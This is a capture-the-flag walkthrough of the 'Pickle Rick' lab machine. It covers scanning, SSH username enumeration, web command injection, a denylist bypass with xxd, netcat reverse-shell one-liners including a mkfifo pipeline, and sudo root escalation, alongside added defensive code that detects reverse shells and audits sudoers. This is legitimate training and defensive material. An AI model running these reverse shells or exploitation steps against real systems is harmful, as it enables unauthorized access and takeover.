Today we will be exploring a Rick and Morty themed machine, where we need to find 3 ingredients to bring Rick into his human form from a pickle.
Let's start off by scanning the machine with Nmap with a quick port scan.
nmap -p- -T4 --reason IPAddress
-T4 second fastest timing template
-p- scan all 65535 TCP ports
--reason display why Nmap thinks a port is open or closed
Now we want to run service enumeration against those ports that were open.
nmap -p22,80 -sV --reason -T4 IPAddress
Let’s check out the web page on port 443. Looks like Rick has changed himself into a pickle and is having some Burps. That must be a hint to use Burp Suite to find the ingredients. Open up Burp Suite, and if you have the latest version, you can open a browser within Burp. This way all the traffic goes through the Burp Proxy, but you don’t have to do any additional configuration.
Once Burp Suite opens, click on the Proxy tab, then intercept. Now click on Open Browser. This will ensure all our traffic goes through Burp.
You can turn intercept off to just go explore the website without having to forward all the requests. Traffic will still route through burp, so you can view them later in HTTP history.
Once you visit the home page, right click and then select Inspect. If we look at the source code, there's a comment saying the username is R1ckRul3s.
If we look at the robots.txt file we see Wubbalubbadubdub. The robots.txt file is where a site tells search engine crawlers which pages they should not index. For example, you wouldn't want them to index customer data pages, such as order records, because then anyone could find something that only an authorized user should see. Keep in mind that robots.txt is only a request to well-behaved crawlers, not an access control, and it is readable by anyone, so it often ends up pointing attackers at exactly the paths a site wanted hidden.
After searching for the SSH version it seems we may have username enumeration. Search Google for OpenSSH 7.2p2, and we can find some exploit code. We need to create a user list.
https://www.exploit-db.com/exploits/40136
Save the code as UsernameEnum.py. Add rick, morty, Rick, Morty, Pickle, pickle, and R1ckRul3s to a text file called Userlist.txt.
Run the exploit with
python3 UsernameEnum.py -U Userlist.txt IPAddress
We get an error that the time module has no clock attribute. If we Google that, it turns out time.clock() was removed in Python 3.8 and replaced with perf_counter() or process_time().
nano UsernameEnum.py
Hit CTRL + \ for find and replace
Search for clock and replace it with process_time. It should replace 2 instances. Save it and run the exploit again and you will start your username enumeration.
Doesn't look like any of our usernames worked. This exploit measures how long SSH takes to respond to an authentication attempt; if the response takes longer than a threshold, the script assumes the user exists.
Let's try running GoBuster to find some hidden directories. We will use the dir mode for directory busting and -x to specify extensions. Apache sites commonly serve PHP, so we will try that extension first.
gobuster dir -x php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://IPAddress
Right away we get some hits! Let’s go explore login and portal.
Remember that we found the username in the comments of the main web page, and there was a strange entry in robots.txt. Turns out that is our password, so log in with
R1ckRul3s
Wubbalubbadubdub
We can run commands directly on the operating system, let’s hunt for the ingredients.
ls
cat Sup3rS3cretPickl3Ingred.txt
Well played. :/ Maybe we can use xxd to gain information about the file. xxd creates a hex dump of the file, with the raw bytes alongside their printable characters, so it can reveal the contents even when the usual file readers are blocked.
xxd Sup3rS3cretPickl3Ingred.txt
That’s our first ingredient!
Let’s keep looking around the file system.
ls -R /home
xxd "/home/rick/second ingredients"
cat /etc/passwd
This shows us an Ubuntu user. Good to note, maybe we can find their password later.
I wonder if we can get a reverse shell. Let’s look for a tool called netcat. This tool allows you to read and write data across network connections. This makes it a great way to get shells or transfer documents from host to host.
which nc
Let’s set up a listener on our attacker machine. This will listen for connections coming from other machines.
nc -nlvp 1337
Now under commands run the following to get a shell!
nc IPAddress 1337 -e /bin/sh
Well, so I thought: no shell :/ I have seen that the -e option for execute may also be the -c option, so let's try that. This time I am writing any output to a file, because I was having issues getting the command to work.
nc IPAddress 1337 -c /bin/sh > /tmp/error.txt && xxd /tmp/error.txt
Oh, it looks like we have the minimal version of netcat without the nice features (no -e or -c support).
None of my shells were working, so I found a great article on how to get a netcat shell with a limited version of netcat.
NOTE: We have a listener set up on port 1337. If yours isn’t running anymore start it again with
nc -nlvp 1337
I want to be sure I am in a writable directory, so move into /tmp. Then we create a named pipe via mkfifo and run a shell with its input and output redirected through that pipe and the netcat connection. Great article on getting shells with neutered netcat. (https://dharma-adiputra.medium.com/neutered-netcat-no-prob-1ac188449d1) You can replace /bin/sh with /bin/bash, or once you land you can get a bash shell by running /bin/bash -i.
cd /tmp && mkfifo f && nc IP Port 0<f | /bin/sh -i 2>&1 | tee f
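From the defender's side, the two reverse shell attempts above (netcat with -e/-c, then the mkfifo pipeline) are exactly the command-line shapes that process auditing should flag when a web server account runs them. The following is an added example, not part of the original walkthrough: a small Python classifier run over constructed process-audit lines (user, PID, command), which returns the reasons each line was flagged. The line format and sample lines are assumptions for the example.

```python
import re

# Constructed sample audit lines in the shape "user pid command".
# These are invented for the example, not captured from the machine.
SAMPLE_AUDIT_LINES = [
    "www-data  1412  ls -la /var/www/html",
    "www-data  1413  nc 10.0.0.5 1337 -e /bin/sh",
    "www-data  1414  cd /tmp && mkfifo f && nc 10.0.0.5 1337 0<f | /bin/sh -i 2>&1 | tee f",
    "www-data  1415  xxd Sup3rS3cretPickl3Ingred.txt",
    "rick      2201  nc -z localhost 80",
]

# netcat invoked with -e or -c inside the same pipeline segment
NC_EXEC = re.compile(r"(?:^|\s)(?:nc|ncat|netcat)\s[^|;&]*\s-[ce]\s")
# any netcat invocation at all
NC_ANY = re.compile(r"(?:^|\s)(?:nc|ncat|netcat)\s")
# an interactive shell being started explicitly
SHELL_INTERACTIVE = re.compile(r"(?:^|\s)(?:/bin/)?(?:ba|da)?sh\s+-i(?:\s|$)")


def classify_command(cmd):
    """Return a list of reasons this command line looks like a reverse shell."""
    reasons = []
    if NC_EXEC.search(cmd):
        reasons.append("netcat -e/-c hands the connection to a program")
    if "mkfifo" in cmd and NC_ANY.search(cmd) and "|" in cmd:
        reasons.append("named pipe chained into netcat (neutered-netcat shell pattern)")
    if SHELL_INTERACTIVE.search(cmd):
        reasons.append("interactive shell spawned from a non-interactive context")
    return reasons


def scan_audit_lines(lines):
    """Parse 'user pid command' lines and return (user, pid, reasons) for hits."""
    hits = []
    for line in lines:
        parts = line.split(None, 2)
        if len(parts) != 3:
            continue  # malformed line; skip rather than crash
        user, pid, cmd = parts
        reasons = classify_command(cmd)
        if reasons:
            hits.append((user, int(pid), reasons))
    return hits


if __name__ == "__main__":
    for user, pid, reasons in scan_audit_lines(SAMPLE_AUDIT_LINES):
        print(f"{user} pid={pid}: {'; '.join(reasons)}")
```

A service account such as www-data launching netcat or an interactive shell at all is a strong signal on its own; the patterns above just make the triage reason explicit.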
I believe the third ingredient will be within the website potentially so let’s check out that directory. We were interacting with portal.php so let’s read the code.
cd /var/www/html
cat portal.php
Looks like this is what was preventing us from using some of the commands to read files, such as cat, more, and tail. Good thing they forgot about xxd! A denylist of command names is never a complete boundary; there are always other programs that read files.
It looks like they were sending everything else to denied.php, which is why we can't click on any other tabs on the website. Maybe the third ingredient isn't on the website.
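The filter in portal.php is the classic mistake of blocking a few known command names while still executing whatever the user typed. As an added example (not the machine's portal.php, whose source the walkthrough does not reproduce), here is a Python sketch of that denylist check next to the design that actually closes the hole: the user chooses from a fixed set of action names and the server owns the argument vector, so no user-supplied program name or path ever reaches a shell. The command names and actions are assumptions for the example.

```python
import shlex
import subprocess

# Weak design: reject only if the first word is one of a few known readers.
# Any other file reader (xxd, od, strings, base64, ...) sails through.
DENIED_COMMANDS = {"cat", "more", "tail", "head", "less"}


def denylist_allows(command_line):
    """Return True if the denylist filter would let this command through."""
    try:
        argv = shlex.split(command_line)
    except ValueError:
        return False  # unbalanced quotes: refuse rather than guess
    if not argv:
        return False
    return argv[0] not in DENIED_COMMANDS


# Hardened design: a fixed menu of actions mapped to server-owned argv lists.
# No shell is involved and nothing from the request is spliced into argv.
ALLOWED_ACTIONS = {
    "kernel": ["uname", "-r"],
    "disk": ["df", "-h", "/"],
}


def action_permitted(action):
    """The only check needed: is the action name one we defined?"""
    return action in ALLOWED_ACTIONS


def run_allowed(action):
    """Run a permitted action with subprocess (no shell) and return its stdout."""
    if not action_permitted(action):
        raise ValueError(f"action not permitted: {action!r}")
    result = subprocess.run(
        ALLOWED_ACTIONS[action], capture_output=True, text=True, check=False
    )
    return result.stdout


if __name__ == "__main__":
    for cmd in ("cat Sup3rS3cretPickl3Ingred.txt", "xxd Sup3rS3cretPickl3Ingred.txt"):
        print(f"denylist allows {cmd!r}: {denylist_allows(cmd)}")
    print("allowlist permits 'xxd ...':", action_permitted("xxd Sup3rS3cretPickl3Ingred.txt"))
    print("kernel:", run_allowed("kernel").strip())
```

The point of the allowlist version is that there is nothing to bypass: the request carries only a label, and the label either maps to a predefined argv or it is rejected.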
We can look at login.php to see how authentication works.
Looks like we can confirm that there's only the one user on the website, which suggests the remaining ingredient isn't hidden behind some other login.
Maybe only root can see the third ingredient. Let's start trying to escalate privileges.
First check if www-data can run any commands as root.
sudo -l
WOW, we can run any command as root without a password. This is an easy way to become root! A web server account with a NOPASSWD: ALL sudo rule turns any command injection in the site into a full root compromise.
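This is the kind of misconfiguration a periodic host audit should catch before a pentester does. As an added example, not part of the original walkthrough, here is a Python auditor that reads sudoers-style user specifications and flags passwordless rules and any sudo rights granted to service accounts. The sample sudoers text is constructed for the example (the walkthrough only shows the sudo -l result, not the actual file), and the list of service account names is an assumption you would tune for your own hosts.

```python
import re

# Constructed sample sudoers content; not the machine's real /etc/sudoers.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults env_reset
root     ALL=(ALL:ALL) ALL
%sudo    ALL=(ALL:ALL) ALL
www-data ALL=(ALL) NOPASSWD: ALL
backup   ALL=(root) NOPASSWD: /usr/bin/rsync
"""

# Accounts that should never need sudo at all (assumed list).
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "nobody", "mysql"}

# who  host=(runas)  [TAG: ...]  commands
USER_SPEC = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$"
)


def audit_sudoers(text):
    """Return a list of (who, severity, reason) for risky user specifications."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = USER_SPEC.match(line)
        if not m:
            continue  # aliases and other directives are out of scope here
        who = m.group("who")
        nopasswd = "NOPASSWD" in m.group("tags")
        all_cmds = m.group("cmds").strip() == "ALL"
        if who in SERVICE_ACCOUNTS:
            findings.append((who, "high", "service account has sudo rights"))
        elif nopasswd and all_cmds:
            findings.append((who, "high", "passwordless sudo for all commands"))
        elif nopasswd:
            findings.append((who, "medium", "passwordless sudo for specific commands"))
    return findings


if __name__ == "__main__":
    for who, severity, reason in audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{severity}] {who}: {reason}")
```

Run against real hosts, the same parser can be pointed at the output of sudo -l -U user or at the files under /etc/sudoers.d, and the www-data line above is the one that should never survive a review.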
Let’s spawn an interactive root shell.
sudo /bin/bash -i
Now where is that third ingredient?
After searching the file system for the term “third” I wasn’t finding anything.
cd /root
ls
cat 3rd.txt
Turns out they just titled it differently!
Hope you enjoyed the adventure through Pickle Rick. While this wasn't rated very difficult, there are a few little tricks that caused me some trouble.